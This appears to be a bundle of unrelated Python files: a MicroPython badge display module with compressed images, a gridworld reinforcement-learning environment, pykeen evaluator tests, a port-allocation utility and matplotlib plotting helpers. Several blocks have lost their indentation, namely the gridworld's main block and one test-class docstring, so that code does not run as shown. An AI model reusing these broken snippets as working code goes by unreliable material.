        # breaks hasattr()/copy(); unknown attributes must raise.
        raise AttributeError(attr)
# Color aliases must point at button names; "yellow" previously mapped
# to "red" (another alias), so `buttons.yellow` raised KeyError.  Per
# the pin comments above, yellow is the "right" button.
buttons = Buttons({"down":down_p, "up":up_p, "left":left_p, "right":right_p} ,
                  aliases={"red":"up", "blue":"left", "yellow":"right", "green":"down"})
# Screen image decompression
def unpack(packed_data):
    """Expand image data compressed by 'pack' into a bytearray.

    Format: ``[version, total_length, item, ...]`` where each item is
    either a plain byte value or a ``[value, count]`` run.
    """
    # Refuse data written with a different format version.
    if packed_data[0] != 1:
        print("Don't know how to decompress this image, format version:", packed_data[0])
        return None
    # Allocate the full zero-filled output up front so unpacking does
    # not churn through many intermediate objects.
    out = bytearray(packed_data[1])
    pos = 0
    for item in packed_data[2:]:  # elements 0 and 1 are version/length
        if isinstance(item, int):
            # Literal byte.
            out[pos] = item
            pos += 1
        elif item[0] == 0:
            # Zero runs need no writes - the buffer starts zeroed.
            pos += item[1]
        else:
            value, count = item
            out[pos:pos + count] = bytes([value]) * count
            pos += count
    return out
# Showing compressed images
def show_compressed(packed_data, fb_width=124, fb_height=64):
    """Decompress ``packed_data`` and blit it full-screen to the LCD."""
    pixels = unpack(packed_data)
    frame = framebuf.FrameBuffer(pixels, fb_width, fb_height, framebuf.MONO_VLSB)
    lcd.fill(0)
    lcd.blit(frame, 0, 0)
    lcd.show()
    # Drop the decompressed buffer promptly - RAM is scarce on-device.
    del pixels
    del frame
    gc.collect()
# Run-length encoded splash images for show_compressed().  Format (see
# unpack): [version, unpacked_length, byte_or_[value, count]_run, ...].
cutie_c = [1, 992, [0, 253], 192, [224, 2], 112, 56, 60, [28, 2], [14, 9], [28, 2], 56, 120, 240, 224, 192, 128, [0, 63], 192, 224, 240, 120, 60, 28, [14, 3], [7, 7], 6, [14, 2], 28, 60, 56, 240, 224, 192, 128, [0, 7], 240, 252, 255, 7, 1, [0, 11], 32, [248, 2], [252, 2], 248, 112, [0, 2], 1, 3, 31, 254, 248, 128, [0, 57], 224, 252, 255, 7, 1, [0, 12], 120, [252, 4], 120, [0, 3], 1, 7, 255, 254, 240, [0, 5], 15, 127, 255, 224, 128, [0, 13], [1, 3], [0, 5], 192, 240, 255, 63, 1, [0, 26], 112, [248, 7], 112, [0, 22], 3, 31, 127, 240, 192, 128, [0, 19], 128, 192, 240, 255, 63, 7, [0, 7], 1, 3, 7, 15, 30, 60, 56, 48, [112, 2], [96, 2], [224, 3], 96, [112, 3], [56, 2], 28, 14, 15, 7, 1, [0, 21], 24, 120, 240, 192, 128, [0, 5], 1, 3, 255, 3, 1, [0, 5], 128, 192, 240, 120, 24, [0, 17], 1, 3, 7, 15, 30, 28, [56, 3], [112, 7], 48, [56, 2], 28, 30, 14, 7, 3, 1, [0, 60], 1, 3, 7, 6, 14, [12, 4], 15, 12, 8, [12, 2], [6, 2], [3, 2], 1, [0, 175]]
dead_c = [1, 992, [0, 137], 1, 3, 15, 31, 127, 255, 254, 248, 240, 192, 128, [0, 4], 128, 192, 240, 252, 254, 255, 63, 31, 7, 3, [0, 50], 1, 3, 15, 31, 127, 255, 254, 248, 240, 192, 128, [0, 4], 128, 192, 240, 252, 254, 255, 63, 31, 7, 3, [0, 30], 3, 7, 31, 191, 255, 254, [248, 2], 254, 255, 31, 15, 7, 1, [0, 61], 3, 7, 31, 191, 255, 254, [248, 2], 254, 255, 31, 15, 7, 1, [0, 33], 128, 224, 240, 252, 254, 127, 31, 15, 3, 7, 31, 127, 255, 254, 248, 240, 192, 128, [0, 57], 128, 224, 240, 252, 254, 127, 31, 15, 3, 7, 31, 127, 255, 254, 248, 240, 192, 128, [0, 27], 32, 56, 60, [63, 3], 15, 3, 1, [0, 8], 3, 15, 31, [63, 2], 62, 60, 48, 32, [0, 20], 112, [248, 7], 112, [0, 20], 32, 56, 60, [63, 3], 15, 3, 1, [0, 8], 3, 15, 31, [63, 2], 62, 60, 48, 32, [0, 61], 24, 120, 240, 192, 128, [0, 5], 1, 3, 255, 3, 1, [0, 5], 128, 192, 240, 120, 24, [0, 102], 1, 3, 7, 6, 14, [12, 4], 15, 12, 8, [12, 2], [6, 2], [3, 2], 1, [0, 175]]
nyaa_c = [1, 992, [0, 270], 128, 224, [248, 3], 224, 192, [0, 68], 128, 224, [248, 3], 224, 192, [0, 37], 128, 224, 240, 252, 254, 127, 31, 15, 3, 7, 31, 127, 255, 254, 248, 240, 192, 128, [0, 57], 128, 224, 240, 252, 254, 127, 31, 15, 3, 7, 31, 127, 255, 254, 248, 240, 192, 128, [0, 27], 32, 56, 60, [63, 3], 15, 3, 1, [0, 8], 3, 15, 31, [63, 2], 62, 60, 48, 32, [0, 20], 112, [248, 7], 112, [0, 20], 32, 56, 60, [63, 3], 15, 3, 1, [0, 8], 3, 15, 31, [63, 2], 62, 60, 48, 32, [0, 61], 24, 120, 240, 192, 128, [0, 5], 1, 3, 255, 3, 1, [0, 5], 128, 192, 240, 120, 24, [0, 102], 1, 3, 7, 6, 14, [12, 4], 15, 12, 8, [12, 2], [6, 2], [3, 2], 1, [0, 175]]
|
# https://deeplearningcourses.com/c/artificial-intelligence-reinforcement-learning-in-python
# https://www.udemy.com/artificial-intelligence-reinforcement-learning-in-python
#from __future__ import print_function, division
#from builtins import range
# Note: you may need to update your version of future
# sudo pip install -U future
import numpy as np
import random
#====================== Grid Class definition ==================
class Grid: # Environment
    """Simple gridworld environment for the tabular RL examples.

    State is the agent's (row, col) position; ``set`` supplies the
    reward and action tables after construction.
    """
    def __init__(self, width, height, start):
        self.width = width
        self.height = height
        self.i = start[0]
        self.j = start[1]
    def set(self, rewards, actions):
        # rewards: {(row, col): reward}; actions: {(row, col): legal actions}
        self.rewards = rewards
        self.actions = actions
    def set_state(self, s):
        self.i, self.j = s[0], s[1]
    def current_state(self):
        return (self.i, self.j)
    def is_terminal(self, s):
        # Terminal states have no legal actions.
        return s not in self.actions
    def move(self, action):
        """Apply ``action`` if legal in the current state; return the
        reward (0 when none) of the state we end up in."""
        if action in self.actions[(self.i, self.j)]:
            di, dj = {'U': (-1, 0), 'D': (1, 0),
                      'R': (0, 1), 'L': (0, -1)}.get(action, (0, 0))
            self.i += di
            self.j += dj
        return self.rewards.get((self.i, self.j), 0)
    def undo_move(self, action):
        """Reverse the effect of ``move(action)`` (opposite deltas)."""
        di, dj = {'U': (1, 0), 'D': (-1, 0),
                  'R': (0, -1), 'L': (0, 1)}.get(action, (0, 0))
        self.i += di
        self.j += dj
        # Undoing must land us on a known state - should never fail.
        assert(self.current_state() in self.all_states())
    def game_over(self):
        # Over when the current position offers no actions.
        return (self.i, self.j) not in self.actions
    def all_states(self):
        # Any position that has next actions or yields a reward.
        return set(self.actions.keys()) | set(self.rewards.keys())
#======================================= fucntions =======================
def standard_grid():
    """Build the canonical 3x4 gridworld.

    Layout (x = blocked, s = start, numbers = terminal rewards):
        .  .  .  1
        .  x  . -1
        s  .  .  .
    """
    g = Grid(3, 4, (2, 0))
    g.set(
        rewards={(0, 3): 1, (1, 3): -1},
        # Legal moves from every non-terminal, non-blocked cell.
        actions={
            (0, 0): ('D', 'R'),
            (0, 1): ('L', 'R'),
            (0, 2): ('L', 'D', 'R'),
            (1, 0): ('U', 'D'),
            (1, 2): ('U', 'D', 'R'),
            (2, 0): ('U', 'R'),
            (2, 1): ('L', 'R'),
            (2, 2): ('L', 'R', 'U'),
            (2, 3): ('L', 'U'),
        },
    )
    return g
def negative_grid(step_cost=-0.1):
    """Standard grid, but every non-terminal state pays ``step_cost``,
    penalizing long paths so shorter solutions are preferred."""
    g = standard_grid()
    penalized = ((0, 0), (0, 1), (0, 2),
                 (1, 0), (1, 2),
                 (2, 0), (2, 1), (2, 2), (2, 3))
    g.rewards.update({state: step_cost for state in penalized})
    return g
#print random action
def list_random_action(gg):
    """Print a randomly chosen legal action for every cell of grid ``gg``."""
    for row in range(gg.width):
        print("---------------------------")
        cells = []
        for col in range(gg.height):
            options = gg.actions.get((row, col), ' ')
            cells.append(" %s |" % random.choice(options))
        print("".join(cells))
def print_values(V, g):
    """Pretty-print the state-value table ``V`` for grid ``g``."""
    for row in range(g.width):
        print("---------------------------")
        line = ""
        for col in range(g.height):
            v = V.get((row, col), 0)
            # Negative values use the leading space for the minus sign.
            line += " %.2f|" % v if v >= 0 else "%.2f|" % v
        print(line)
def print_policy(P, g):
    """Pretty-print the deterministic policy table ``P`` for grid ``g``."""
    for row in range(g.width):
        print("---------------------------")
        print("".join(" %s |" % P.get((row, col), ' ')
                      for col in range(g.height)))
if __name__ == "__main__":
grid = Grid(3, 4, (2, 0))
rewards = {(0, 3): 1, (1, 3): -1}
actions = {
(0, 0): ('D', 'R'),
(0, 1): ('L', 'R'),
(0, 2): ('L', 'D', 'R'),
(1, 0): ('U', 'D'),
(1, 2): ('U', 'D', 'R'),
(2, 0): ('U', 'R'),
(2, 1): ('L', 'R'),
(2, 2): ('L', 'R', 'U'),
(2, 3): ('L', 'U'), }
grid.set(rewards, actions)
print('rewards=',grid.rewards)
print('actions=',grid.actions)
|
# -*- coding: utf-8 -*-
"""Test the evaluators."""
import dataclasses
import logging
import unittest
from typing import Any, ClassVar, Dict, Mapping, Optional, Tuple, Type
import torch
from pykeen.datasets import Nations
from pykeen.evaluation import Evaluator, MetricResults, RankBasedEvaluator, RankBasedMetricResults
from pykeen.evaluation.evaluator import create_dense_positive_mask_, create_sparse_positive_filter_, filter_scores_
from pykeen.evaluation.rank_based_evaluator import RANK_TYPES, SIDES, compute_rank_from_scores
from pykeen.evaluation.sklearn import SklearnEvaluator, SklearnMetricResults
from pykeen.models import TransE
from pykeen.models.base import EntityRelationEmbeddingModel, Model
from pykeen.triples import TriplesFactory
from pykeen.typing import MappedTriples
logger = logging.getLogger(__name__)
class _AbstractEvaluatorTests:
    """A test case for quickly defining common tests for evaluators models."""
    # The triples factory and model
    factory: TriplesFactory
    model: Model
    #: The evaluator to be tested
    evaluator_cls: ClassVar[Type[Evaluator]]
    evaluator_kwargs: ClassVar[Optional[Mapping[str, Any]]] = None
    # Settings
    batch_size: int
    embedding_dim: int
    #: The evaluator instantiation
    evaluator: Evaluator
    def setUp(self) -> None:
        """Set up the test case."""
        # Settings
        self.batch_size = 8
        self.embedding_dim = 7
        # Initialize evaluator
        self.evaluator = self.evaluator_cls(**(self.evaluator_kwargs or {}))
        # Use small test dataset
        self.factory = Nations().training
        # Use small model (untrained)
        self.model = TransE(triples_factory=self.factory, embedding_dim=self.embedding_dim)
    def _get_input(
        self,
        inverse: bool = False,
    ) -> Tuple[torch.LongTensor, torch.FloatTensor, Optional[torch.BoolTensor]]:
        """Score one batch and return (hrt_batch, scores, optional positive mask).

        With ``inverse=True`` heads are scored against (r, t); otherwise
        tails are scored against (h, r).
        """
        # Get batch
        hrt_batch = self.factory.mapped_triples[:self.batch_size].to(self.model.device)
        # Compute scores
        if inverse:
            scores = self.model.score_h(rt_batch=hrt_batch[:, 1:])
        else:
            scores = self.model.score_t(hr_batch=hrt_batch[:, :2])
        # Compute mask only if required
        if self.evaluator.requires_positive_mask:
            # TODO: Re-use filtering code
            triples = self.factory.mapped_triples
            # sel_col: column of the entity being ranked;
            # start_col:stop_col: the two fixed columns of the query.
            if inverse:
                sel_col, start_col = 0, 1
            else:
                sel_col, start_col = 2, 0
            stop_col = start_col + 2
            # shape: (batch_size, num_triples)
            triple_mask = (triples[None, :, start_col:stop_col] == hrt_batch[:, None, start_col:stop_col]).all(dim=-1)
            batch_indices, triple_indices = triple_mask.nonzero(as_tuple=True)
            entity_indices = triples[triple_indices, sel_col]
            # shape: (batch_size, num_entities)
            mask = torch.zeros_like(scores, dtype=torch.bool)
            mask[batch_indices, entity_indices] = True
        else:
            mask = None
        return hrt_batch, scores, mask
    def test_process_tail_scores_(self) -> None:
        """Test the evaluator's ``process_tail_scores_()`` function."""
        hrt_batch, scores, mask = self._get_input()
        # Score of the true tail per row, as a column vector.
        true_scores = scores[torch.arange(0, hrt_batch.shape[0]), hrt_batch[:, 2]][:, None]
        self.evaluator.process_tail_scores_(
            hrt_batch=hrt_batch,
            true_scores=true_scores,
            scores=scores,
            dense_positive_mask=mask,
        )
    def test_process_head_scores_(self) -> None:
        """Test the evaluator's ``process_head_scores_()`` function."""
        hrt_batch, scores, mask = self._get_input(inverse=True)
        # Score of the true head per row, as a column vector.
        true_scores = scores[torch.arange(0, hrt_batch.shape[0]), hrt_batch[:, 0]][:, None]
        self.evaluator.process_head_scores_(
            hrt_batch=hrt_batch,
            true_scores=true_scores,
            scores=scores,
            dense_positive_mask=mask,
        )
    def test_finalize(self) -> None:
        """Process one batch, finalize, and delegate result validation."""
        # Process one batch
        hrt_batch, scores, mask = self._get_input()
        true_scores = scores[torch.arange(0, hrt_batch.shape[0]), hrt_batch[:, 2]][:, None]
        self.evaluator.process_tail_scores_(
            hrt_batch=hrt_batch,
            true_scores=true_scores,
            scores=scores,
            dense_positive_mask=mask,
        )
        result = self.evaluator.finalize()
        assert isinstance(result, MetricResults)
        self._validate_result(
            result=result,
            data={'batch': hrt_batch, 'scores': scores, 'mask': mask},
        )
    def _validate_result(
        self,
        result: MetricResults,
        data: Dict[str, torch.Tensor],
    ):
        """Hook for subclasses to check the finalized metric results."""
        logger.warning(f'{self.__class__.__name__} did not overwrite _validate_result.')
class RankBasedEvaluatorTests(_AbstractEvaluatorTests, unittest.TestCase):
    """unittest for the RankBasedEvaluator."""
    evaluator_cls = RankBasedEvaluator
    def _validate_result(
        self,
        result: MetricResults,
        data: Dict[str, torch.Tensor],
    ):
        """Check metric types and admissible value ranges; exact values
        are not asserted since the model is untrained."""
        # Check for correct class
        assert isinstance(result, RankBasedMetricResults)
        # Check value ranges
        # Mean rank lies in [1, num_entities] per side and rank type.
        for side, all_type_mr in result.mean_rank.items():
            assert side in SIDES
            for rank_type, mr in all_type_mr.items():
                assert rank_type in RANK_TYPES
                assert isinstance(mr, float)
                assert 1 <= mr <= self.factory.num_entities
        # Mean reciprocal rank lies in (0, 1].
        for side, all_type_mrr in result.mean_reciprocal_rank.items():
            assert side in SIDES
            for rank_type, mrr in all_type_mrr.items():
                assert rank_type in RANK_TYPES
                assert isinstance(mrr, float)
                assert 0 < mrr <= 1
        # Hits@k lies in [0, 1] for every recorded k.
        for side, all_type_hits_at_k in result.hits_at_k.items():
            assert side in SIDES
            for rank_type, hits_at_k in all_type_hits_at_k.items():
                assert rank_type in RANK_TYPES
                for k, h in hits_at_k.items():
                    assert isinstance(k, int)
                    assert 0 < k < self.factory.num_entities
                    assert isinstance(h, float)
                    assert 0 <= h <= 1
        # TODO: Validate with data?
class SklearnEvaluatorTest(_AbstractEvaluatorTests, unittest.TestCase):
    """Unittest for the SklearnEvaluator."""
    evaluator_cls = SklearnEvaluator
    def _validate_result(
        self,
        result: MetricResults,
        data: Dict[str, torch.Tensor],
    ):
        """Recompute each sklearn metric from the raw scores/mask and
        compare against the reported values."""
        # Check for correct class
        assert isinstance(result, SklearnMetricResults)
        # check value
        scores = data['scores'].detach().numpy()
        mask = data['mask'].detach().float().numpy()
        # filtering
        # Deduplicate (h, r) pairs keeping the last occurrence's index;
        # presumably mirrors the evaluator's internal filtering - confirm.
        uniq = dict()
        batch = data['batch'].detach().numpy()
        for i, (h, r) in enumerate(batch[:, :2]):
            uniq[int(h), int(r)] = i
        indices = sorted(uniq.values())
        mask = mask[indices]
        scores = scores[indices]
        # Each result field carries its metric function in the dataclass
        # field metadata under key 'f'.
        for field in dataclasses.fields(SklearnMetricResults):
            f = field.metadata['f']
            exp_score = f(mask.flat, scores.flat)
            self.assertAlmostEqual(result.get_metric(field.name), exp_score)
class EvaluatorUtilsTests(unittest.TestCase):
"""Test the utility functions used by evaluators."""
    def setUp(self) -> None:
        """Set up the test case with a fixed random seed."""
        # Seeded generator makes the random tensors below reproducible.
        self.generator = torch.random.manual_seed(seed=42)
    def test_compute_rank_from_scores(self):
        """Test the _compute_rank_from_scores() function."""
        batch_size = 3
        all_scores = torch.tensor([
            [2., 2., 1., 3., 5.],
            [1., 1., 3., 4., 0.],
            [1., 1., 3., float('nan'), 0],
        ])
        # true_score: (2, 3, 3)
        true_score = torch.tensor([2., 3., 3.]).view(batch_size, 1)
        # Expected optimistic (best) / pessimistic (worst) ranks; row 0
        # ties with its true score, hence best != worst there.
        exp_best_rank = torch.tensor([3., 2., 1.])
        exp_worst_rank = torch.tensor([4., 2., 1.])
        exp_avg_rank = 0.5 * (exp_best_rank + exp_worst_rank)
        # Adjusted rank divides by the expected average rank; note the
        # NaN row uses 4 instead of 5 candidates in its divisor.
        exp_adj_rank = exp_avg_rank / torch.tensor([(5 + 1) / 2, (5 + 1) / 2, (4 + 1) / 2])
        ranks = compute_rank_from_scores(true_score=true_score, all_scores=all_scores)
        best_rank = ranks.get('best')
        assert best_rank.shape == (batch_size,)
        assert (best_rank == exp_best_rank).all()
        worst_rank = ranks.get('worst')
        assert worst_rank.shape == (batch_size,)
        assert (worst_rank == exp_worst_rank).all()
        avg_rank = ranks.get('avg')
        assert avg_rank.shape == (batch_size,)
        assert (avg_rank == exp_avg_rank).all(), (avg_rank, exp_avg_rank)
        adj_rank = ranks.get('adj')
        assert adj_rank.shape == (batch_size,)
        assert (adj_rank == exp_adj_rank).all(), (adj_rank, exp_adj_rank)
    def test_create_sparse_positive_filter_(self):
        """Test method create_sparse_positive_filter_."""
        batch_size = 4
        factory = Nations().training
        all_triples = factory.mapped_triples
        batch = all_triples[:batch_size, :]
        # head based filter
        sparse_positives, relation_filter = create_sparse_positive_filter_(
            hrt_batch=batch,
            all_pos_triples=all_triples,
            relation_filter=None,
            filter_col=0,
        )
        # preprocessing for faster lookup
        triples = set()
        for trip in all_triples.detach().numpy():
            triples.add(tuple(map(int, trip)))
        # check that all found positives are positive
        for batch_id, entity_id in sparse_positives:
            # The filtered head plus the row's (r, t) must form a known
            # positive triple.
            same = batch[batch_id, 1:]
            assert (int(entity_id),) + tuple(map(int, same)) in triples
    def test_create_dense_positive_mask_(self):
        """Test method create_dense_positive_mask_."""
        batch_size = 3
        num_positives = 5
        num_entities = 7
        zero_tensor = torch.zeros(batch_size, num_entities)
        # (batch_index, entity_index) pairs marking the positives.
        filter_batch = torch.empty(num_positives, 2, dtype=torch.long)
        for i in range(num_positives):
            filter_batch[i, 0] = i % batch_size
        filter_batch[:, 1] = torch.randperm(num_positives, generator=self.generator)
        dense_mask = create_dense_positive_mask_(zero_tensor=zero_tensor, filter_batch=filter_batch)
        # check in-place
        assert id(dense_mask) == id(zero_tensor)
        # Every listed pair must be set; all other entries untouched.
        for b in range(batch_size):
            for e in range(num_entities):
                if (torch.as_tensor([b, e]).view(1, 2) == filter_batch).all(dim=1).any():
                    assert dense_mask[b, e] == 1
                else:
                    assert dense_mask[b, e] == 0
    def test_filter_corrupted_triples(self):
        """Test the filter_corrupted_triples() function."""
        batch_size = 2
        num_entities = 4
        # All known positive triples (h, r, t); the batch below is its first two rows.
        all_pos_triples = torch.tensor(
            [
                [0, 1, 2],
                [1, 2, 3],
                [1, 3, 3],
                [3, 4, 1],
                [0, 2, 2],
                [3, 1, 2],
                [1, 2, 0],
            ], dtype=torch.long,
        )
        batch = torch.tensor(
            [
                [0, 1, 2],
                [1, 2, 3],
            ], dtype=torch.long,
        )
        # Position of each batch triple's true head / tail entity.
        head_filter_mask = torch.tensor(
            [
                [True, False, False, False],
                [False, True, False, False],
            ], dtype=torch.bool,
        )
        tail_filter_mask = torch.tensor(
            [
                [False, False, True, False],
                [False, False, False, True],
            ], dtype=torch.bool,
        )
        # Expected filtered positions: all entities that form a known positive
        # with the batch row's (r, t) — e.g. (3, 1, 2) makes head 3 filtered
        # for batch row (0, 1, 2).
        exp_head_filter_mask = torch.tensor(
            [
                [True, False, False, True],
                [False, True, False, False],
            ], dtype=torch.bool,
        )
        exp_tail_filter_mask = torch.tensor(
            [
                [False, False, True, False],
                [True, False, False, True],
            ], dtype=torch.bool,
        )
        assert batch.shape == (batch_size, 3)
        assert head_filter_mask.shape == (batch_size, num_entities)
        assert tail_filter_mask.shape == (batch_size, num_entities)
        # Test head scores
        head_scores = torch.randn(batch_size, num_entities, generator=self.generator)
        old_head_scores = head_scores.detach().clone()
        positive_filter_heads, relation_filter = create_sparse_positive_filter_(
            hrt_batch=batch,
            all_pos_triples=all_pos_triples,
            relation_filter=None,
            filter_col=0,
        )
        filtered_head_scores = filter_scores_(
            scores=head_scores,
            filter_batch=positive_filter_heads,
        )
        # Assert in-place modification
        mask = torch.isfinite(head_scores)
        assert (head_scores[mask] == filtered_head_scores[mask]).all()
        assert not torch.isfinite(filtered_head_scores[~mask]).any()
        # Assert correct filtering: filtered positions become non-finite,
        # all other scores are untouched.
        assert (old_head_scores[~exp_head_filter_mask] == filtered_head_scores[~exp_head_filter_mask]).all()
        assert not torch.isfinite(filtered_head_scores[exp_head_filter_mask]).any()
        # Test tail scores (re-using the relation filter computed above)
        tail_scores = torch.randn(batch_size, num_entities, generator=self.generator)
        old_tail_scores = tail_scores.detach().clone()
        positive_filter_tails, _ = create_sparse_positive_filter_(
            hrt_batch=batch,
            all_pos_triples=all_pos_triples,
            relation_filter=relation_filter,
            filter_col=2,
        )
        filtered_tail_scores = filter_scores_(
            scores=tail_scores,
            filter_batch=positive_filter_tails,
        )
        # Assert in-place modification
        mask = torch.isfinite(tail_scores)
        assert (tail_scores[mask] == filtered_tail_scores[mask]).all()
        assert not torch.isfinite(filtered_tail_scores[~mask]).any()
        # Assert correct filtering
        assert (old_tail_scores[~exp_tail_filter_mask] == filtered_tail_scores[~exp_tail_filter_mask]).all()
        assert not torch.isfinite(filtered_tail_scores[exp_tail_filter_mask]).any()
class DummyEvaluator(Evaluator):
    """A dummy evaluator for testing the structure of the evaluation function."""

    def __init__(self, *, counter: int, filtered: bool, automatic_memory_optimization: bool = True) -> None:
        super().__init__(filtered=filtered, automatic_memory_optimization=automatic_memory_optimization)
        # Incremented once per tail batch and decremented once per head batch,
        # so a balanced evaluation run leaves it at its initial value.
        self.counter = counter

    def process_tail_scores_(
        self,
        hrt_batch: MappedTriples,
        true_scores: torch.FloatTensor,
        scores: torch.FloatTensor,
        dense_positive_mask: Optional[torch.FloatTensor] = None,
    ) -> None:  # noqa: D102
        self.counter += 1

    def process_head_scores_(
        self,
        hrt_batch: MappedTriples,
        true_scores: torch.FloatTensor,
        scores: torch.FloatTensor,
        dense_positive_mask: Optional[torch.FloatTensor] = None,
    ) -> None:  # noqa: D102
        self.counter -= 1

    def finalize(self) -> MetricResults:  # noqa: D102
        # Expose the counter as mean_rank so tests can read it back.
        return RankBasedMetricResults(
            mean_rank=self.counter,
            mean_reciprocal_rank=None,
            adjusted_mean_rank=None,
            hits_at_k=dict(),
        )

    def __repr__(self):  # noqa: D105
        # Bug fix: this class never defines ``losses`` (only ``counter``), so
        # the previous f-string raised AttributeError on repr().
        return f'{self.__class__.__name__}(counter={self.counter})'
class MockModel(EntityRelationEmbeddingModel):
    """A dummy model returning fake scores."""

    def __init__(self, triples_factory: TriplesFactory):
        super().__init__(triples_factory=triples_factory)
        # Fixed score vector: entity i always receives score i.
        self.scores = torch.arange(self.num_entities, dtype=torch.float)

    def _generate_fake_scores(self, batch: torch.LongTensor) -> torch.FloatTensor:
        """Generate fake scores s[b, i] = i of size (batch_size, num_entities)."""
        n_rows = batch.shape[0]
        tiled = self.scores.view(1, -1).repeat(n_rows, 1)
        assert tiled.shape == (n_rows, self.num_entities)
        return tiled

    def score_hrt(self, hrt_batch: torch.LongTensor) -> torch.FloatTensor:  # noqa: D102
        return self._generate_fake_scores(batch=hrt_batch)

    def score_t(self, hr_batch: torch.LongTensor) -> torch.FloatTensor:  # noqa: D102
        return self._generate_fake_scores(batch=hr_batch)

    def score_h(self, rt_batch: torch.LongTensor) -> torch.FloatTensor:  # noqa: D102
        return self._generate_fake_scores(batch=rt_batch)

    def reset_parameters_(self) -> Model:  # noqa: D102
        pass  # Not needed for unittest
class TestEvaluationStructure(unittest.TestCase):
    """Tests for testing the correct structure of the evaluation procedure."""

    def setUp(self):
        """Prepare for testing the evaluation structure."""
        self.counter = 1337
        self.evaluator = DummyEvaluator(
            counter=self.counter,
            filtered=True,
            automatic_memory_optimization=False,
        )
        self.triples_factory = Nations().training
        self.model = MockModel(triples_factory=self.triples_factory)

    def test_evaluation_structure(self):
        """Test if the evaluator has a balanced call of head and tail processors."""
        result = self.evaluator.evaluate(
            model=self.model,
            mapped_triples=self.triples_factory.mapped_triples,
            batch_size=1,
            use_tqdm=False,
        )
        # Tail batches increment and head batches decrement the counter, so a
        # balanced run must report the initial value.
        assert result.mean_rank == self.counter, 'Should end at the same value as it started'
|
# -*- coding: utf-8 -*-
import socket
from threading import Lock
def public_ipv4():
    """Return this host's first public IPv4 address.

    getaddrinfo sorts its results per RFC 3484, so the first IPv4 entry
    should be the real public address.  Returns None when no IPv4
    stream/datagram address is found (the test layer cannot handle v6
    addresses at the moment).
    """
    for family, socktype, _proto, _canonname, sockaddr in socket.getaddrinfo(socket.gethostname(), None):
        if family == socket.AF_INET and socktype in (socket.SOCK_STREAM, socket.SOCK_DGRAM):
            return sockaddr[0]
class PortPool(object):
    """
    Pool that returns a unique available port
    reported by the kernel.
    """
    # Maximum number of re-draws before giving up.
    MAX_RETRIES = 10

    def __init__(self):
        # Ports already handed out by this pool instance.
        self.ports = set()
        # Guards self.ports against concurrent access.
        self.lock = Lock()

    def bind_port(self, addr, port):
        """Bind and immediately release a socket; return the bound port.

        Passing port=0 lets the kernel pick a currently free port.
        """
        sock = socket.socket()
        sock.bind((addr, port))
        port = sock.getsockname()[1]
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except Exception:
            # ok, at least we know that the socket is not connected
            pass
        sock.close()
        return port

    def random_available_port(self, addr):
        """Ask the kernel for any currently free port on addr."""
        return self.bind_port(addr, 0)

    def get(self, addr='127.0.0.1'):
        """Return a free port that this pool has not handed out before."""
        retries = 0
        port = self.random_available_port(addr)
        with self.lock:
            while port in self.ports:
                port = self.random_available_port(addr)
                retries += 1
                if retries > self.MAX_RETRIES:
                    raise OSError("Could not get free port. Max retries exceeded.")
            self.ports.add(port)
        return port

    def get_range(self, addr='127.0.0.1', range_size=1):
        """Reserve a consecutive run of ports; return "start-end" (inclusive).

        NOTE(review): with range_size=1 this reserves TWO ports (start and
        start+1) because port_end = port_start + range_size + 1 — confirm
        whether range_size counts *additional* ports beyond the first.
        """
        retries = 0
        while True:
            port_start = self.get(addr)
            port_end = port_start + range_size + 1
            with self.lock:
                # Start over if any port of the candidate run is already taken.
                loop_continue = False
                for i in range(port_start + 1, port_end):
                    if i in self.ports:
                        loop_continue = True
                        break
                if (loop_continue):
                    continue
                try:
                    # Verify each port is actually bindable, then reserve it.
                    for i in range(port_start, port_end):
                        self.bind_port(addr, i)
                        self.ports.add(i)
                    break
                except Exception:
                    # NOTE(review): ports added before the failing bind stay
                    # reserved in self.ports even though the range is abandoned.
                    retries += 1
                    if retries > self.MAX_RETRIES:
                        raise OSError("Could not get free port range. Max retries exceeded.")
                    continue
        return "{}-{}".format(port_start, port_end - 1)
# Shared module-level pool so that all callers draw from one set of reserved ports.
GLOBAL_PORT_POOL = PortPool()
|
# -*- coding: utf8 -*-
"""
This is part of shot detector.
Produced by w495 at 2017.05.04 04:18:27
"""
from __future__ import absolute_import, division, print_function
from .base_shot_detector import BaseShotDetector
class CommonDetector(BaseShotDetector):
    """
    Placeholder detector: inherits all behaviour from BaseShotDetector
    without overriding anything.
    """
    pass
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 3rd party imports
from matplotlib.transforms import TransformedBbox, blended_transform_factory
from mpl_toolkits.axes_grid1.inset_locator import (BboxPatch, BboxConnector,
BboxConnectorPatch)
__author__ = "Louis Richard"
__email__ = "louisr@irfu.se"
__copyright__ = "Copyright 2020-2021"
__license__ = "MIT"
__version__ = "2.3.7"
__status__ = "Prototype"
def _connect_bbox(bbox1, bbox2, loc1a, loc2a, loc1b, loc2b, prop_lines,
                  prop_patches: dict = None):
    """Build the two connector lines and the patches linking two bboxes."""
    if prop_patches is None:
        # Default patch style: same as the lines but fully transparent.
        prop_patches = dict(prop_lines)
        prop_patches["alpha"] = prop_patches.get("alpha", 1) * 0
    connectors = []
    for loc1, loc2 in ((loc1a, loc2a), (loc1b, loc2b)):
        connector = BboxConnector(bbox1, bbox2, loc1=loc1, loc2=loc2,
                                  **prop_lines)
        connector.set_clip_on(False)
        connectors.append(connector)
    patch1 = BboxPatch(bbox1, **prop_patches)
    patch2 = BboxPatch(bbox2, **prop_patches)
    joining_patch = BboxConnectorPatch(bbox1, bbox2, loc1a=loc1a,
                                       loc2a=loc2a, loc1b=loc1b,
                                       loc2b=loc2b, **prop_patches)
    joining_patch.set_clip_on(False)
    return connectors[0], connectors[1], patch1, patch2, joining_patch
def zoom(ax1, ax2, **kwargs):
    r"""Similar to zoom_effect01. The xmin & xmax will be taken from the
    ax1.viewLim.

    Parameters
    ----------
    ax1 : matplotlib.pyplot.subplotsaxes
        Reference axes.
    ax2 : matplotlib.pyplot.subplotsaxes
        Connected axes.

    Other Parameters
    ----------------
    **kwargs
        Keyword arguments control the BboxPatch.

    Returns
    -------
    ax1 : matplotlib.pyplot.subplotsaxes
        Reference axis.
    ax2 : matplotlib.pyplot.subplotsaxes
        Connected axis.

    """
    # Map ax1's view limits onto ax2: x in data coordinates, y in axes coords.
    y_transform = ax1.transScale + (ax1.transLimits + ax2.transAxes)
    mixed_transform = blended_transform_factory(ax2.transData, y_transform)
    reference_bbox = ax1.bbox
    zoomed_bbox = TransformedBbox(ax1.viewLim, mixed_transform)
